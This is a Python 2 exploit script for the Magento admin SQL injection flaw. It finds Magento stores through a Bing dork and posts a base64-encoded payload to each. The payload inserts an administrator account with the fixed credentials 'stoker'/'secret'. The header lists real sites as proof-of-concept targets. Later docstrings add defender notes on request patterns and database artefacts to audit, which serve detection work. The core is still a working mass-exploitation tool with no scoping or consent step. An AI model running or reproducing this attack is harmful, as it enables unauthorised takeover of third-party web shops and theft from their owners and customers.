- #!/usr/bin/python
- '''
- POC Sites:
- www.anandindia.in
- goyalglassware.com
- ishopping.pk
- value.pk
- References:
- http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/
- '''
- try:
- from urlparse import urlsplit
- import requests, base64, sys, re, os
- except:
- exit("\n\n[-] Import Error !\n")
def Exploit(url):
    """Send the injected admin-user SQL to ``url`` and print the outcome.

    ``url`` is a bare host name (``main`` passes ``urlsplit(...).netloc``);
    the request always goes over plain ``http://``.  The statements in ``q``
    are collapsed onto one line, appended to the ``popularity[field_expr]``
    filter value and base64-encoded into the ``filter`` form field;
    ``___directive`` is a fixed base64 value and ``forwarded`` is 1.  The only
    success test is ``r.ok`` (HTTP status below 400), which says nothing about
    whether any row was written, so the printed "Credentials" line can be a
    false positive and the "Not Vulnerable" line a false negative.

    Python 2 code: ``print`` statements, ``urlparse`` and ``b64encode`` on a
    ``str``; it will not run unchanged under Python 3.

    Defender notes: an unauthenticated POST to
    ``/admin/Cms_Wysiwyg/directive/index/`` carrying ``___directive``,
    ``filter`` and ``forwarded`` form fields is the request shape to alert on
    at the edge.  Unexpected ``admin_user`` rows (here a fixed user name and
    password) and ``admin_role`` rows with ``role_type = 'U'`` are the
    database artefacts to audit for after the fact.  The Checkpoint write-up
    linked in the module docstring covers the flaw and the vendor fix.
    """
    final_url = "http://" + url + "/admin/Cms_Wysiwyg/directive/index/"
    # Multi-statement SQL template; {username} / {password} are filled in by
    # str.format below, so the created account is always 'stoker' / 'secret'.
    q = """
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""
    # Newlines are stripped so the whole payload fits in one filter value.
    query = q.replace("\n", "").format(username="stoker", password="secret")
    # The literal "0);" precedes the injected statements inside field_expr.
    pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
    r = requests.post(final_url,
                      data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                            "filter": base64.b64encode(pfilter),
                            "forwarded": 1})
    # r.ok only reflects the HTTP status, not whether the INSERTs succeeded.
    if r.ok:
        print "\n -- > [{0}/admin] Credentials: ['stoker' : 'secret']".format(url)
    else:
        print " [-] {0} Not Vulnerable".format(url)
def main():
    """Collect host names from one Bing results page and call ``Exploit`` on each.

    Every ``href`` the regex finds in the Bing HTML — result links, Bing's own
    navigation links, anything else with a non-empty ``netloc`` — is passed to
    ``Exploit``; there is no scoping, allow-list, consent or rate-limit step
    between harvesting and sending the request.  Exceptions raised by
    ``requests`` propagate to the bare ``except`` in the ``__main__`` guard,
    which exits without a traceback.
    """
    # Change Dork in Bing URL if u need to modify it !
    # Google Will also Work Same, infact more better if you use
    # inurl:js/magentothem/
    # dork, but it'll ask you to enter captcha after multiple requests from the same ip
    # i'm too lazy to play with that, so i gone ahead with bing.
    # Bing's instreamUrl:Title:URL is not gonna work Here !
    response = requests.get('http://www.bing.com/search?q=Powered+by+Magento+site%3Apk')
    # Naive href extraction: matches every link in the page, not only search results.
    URLs = re.findall(r'href=[\'"]?([^\'" >]+)', response.content)
    URLS_LIST = []  # host names (netloc) harvested from the links
    for url in URLs:
        baseUrl = urlsplit(url).netloc  # relative hrefs yield an empty netloc
        if len(baseUrl) != 0:  # skip relative links
            URLS_LIST.append(baseUrl)
    for uri in set(URLS_LIST):  # set() deduplicates hosts
        Exploit(uri)  # one unauthenticated POST per distinct host
if __name__ == '__main__':
    # 'cls' is the Windows console clear; presumably a no-op failure elsewhere.
    os.system('cls')
    try:
        print '''\n
-------------------------------------------------
Title: Magento Auth Exploit !
Author: Muhammad Adeel
Mail: Chaudhary1337@gmail.com
Blog: http://urdusecurity.blogspot.com
-------------------------------------------------\n\n
'''
        main()
    except:
        # Bare except: any error from main() (network failures, KeyboardInterrupt,
        # ...) is swallowed and replaced by this message, with no traceback.
        exit("\nErrrrrrrrrrrrrrrrroooooooooooooooooooooorrrrrrrrrrrrrrrrrrrrrrrrrrr !!!")